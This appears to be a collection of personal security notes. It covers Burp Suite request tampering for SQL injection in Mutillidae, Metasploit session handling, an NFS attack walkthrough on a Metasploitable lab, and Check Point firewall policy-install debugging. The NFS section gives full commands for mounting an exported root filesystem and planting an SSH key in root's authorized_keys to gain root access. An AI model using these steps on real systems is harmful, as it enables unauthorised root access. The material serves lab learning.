Mutillidae: Basics of Web Request and Response Interception with Burp-Suite

There is something more here;

• It explains the method to bypass the java script validation built on the client side (browser). 
• After transferring normal strings, change the strings to SQL injection on-the-fly with Burp or another proxy utility.

Fun stuff! :)

Exposing Flash Application Vulnerabilities with SWFScan

Download link on White Rabbit Blog;
http://h30499.www3.hp.com/t5/Following-the-White-Rabbit-A/SWFScan-FREE-Flash-decompiler/ba-p/5440167

sessions (msfconsole)

Is there a background session?

sessions

.
.
list the sessions established
.
.

to connect one of them

sessions -i [session_id]

Unix Fundamentals - NFS Service / Attack Illustration

look at the Network File System (NFS). NFS can be identified by probing port 2049 directly or asking the portmapper for a list of services.The example below using rpcinfo to identify NFS and showmount -e to determine that the "/" share (the root of the file system) is being exported. You will need the rpcbind and nfs-common Ubuntu packages to follow along.

root@ubuntu:~# rpcinfo -p 192.168.99.131

.
.
.

    100003    2   tcp   2049  nfs

    100003    3   tcp   2049  nfs

    100003    4   tcp   2049  nfs

.
.
.

root@ubuntu:~# showmount -e 192.168.99.131



Getting access to a system with a writeable filesystem like this is trivial. To do so (and because SSH is running), we will generate a new SSH key on our attacking system, mount the NFS export, and add our key to the root user account's authorized_keys file: 


root@ubuntu:~# ssh-keygen
root@ubuntu:~# mkdir /tmp/r00t
root@ubuntu:~# mount -t nfs 192.168.99.131:/ /tmp/r00t/

mount.nf: rpc.statd is not running but is required for remote locking.
mount.nfs: Either use '-o nolock' to keep locks local, or start statd. 
mount.nfs: an incorrect mount option was specified.


This is the message you get when you try to mount the NFS export. 

restarting nfs-common is not enough

• service nfs-common restart

restarting rpc will resolve the issue.

• service rpcbind restart

root@ubuntu:~# cat /root/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys 


ssh root@192.168.99.131 

//with the password generated on the ssh-keygen (then add our pub file -key- into the account's authorized_keys file on the remote machine), you can access to the remote system. yay. 

root@metasploitable:~#



The environment include Kali and Metasploitable II.

Reference:
https://community.rapid7.com/docs/DOC-1875 

Debug Policy Install

Debugging a manual policy pull from the enforcement point, and push from the SmartCenter, like so:

fw -d fetch <SmartCenter server IP address>

• fw -d fetchlocal -d $FWDIR/state/__tmp/FW1 &> <output file>

cpd.elg files from $CPDIR/log from the firewall



Push from the Smart Center to enforcement point;

fwm -d load policy_name gateway_name 2> <filename>.txt

Policy installation fails with "ERROR: function or table < pgm_len_block_code > undefined" and ".../conf/updates.def"

SYMPTOMS

After upgrading a Security Management to R76, policy installation in SmartDashboard fails with the following errors: "/opt/.../conf/updates.def", line N: ERROR: syntax error "/opt/.../conf/<Policy_Name>.pf", line N: ERROR: function or table < pgm_len_block_code > undefined "/opt/.../conf/<Policy_Name>.pf", line N: ERROR: syntax error Compilation failed. Operation ended with errors. Debug of FWM daemon (per sk86186) shows the same 'ERROR: syntax error'. Hotfix for IPv6 flavor issue from sk92933 does not help.

CAUSE

IPS definitions are not up-to-date, or do not exist. SOLUTION Perform IPS Update in SmartDashboard. The issue occurred on R77 env. as well.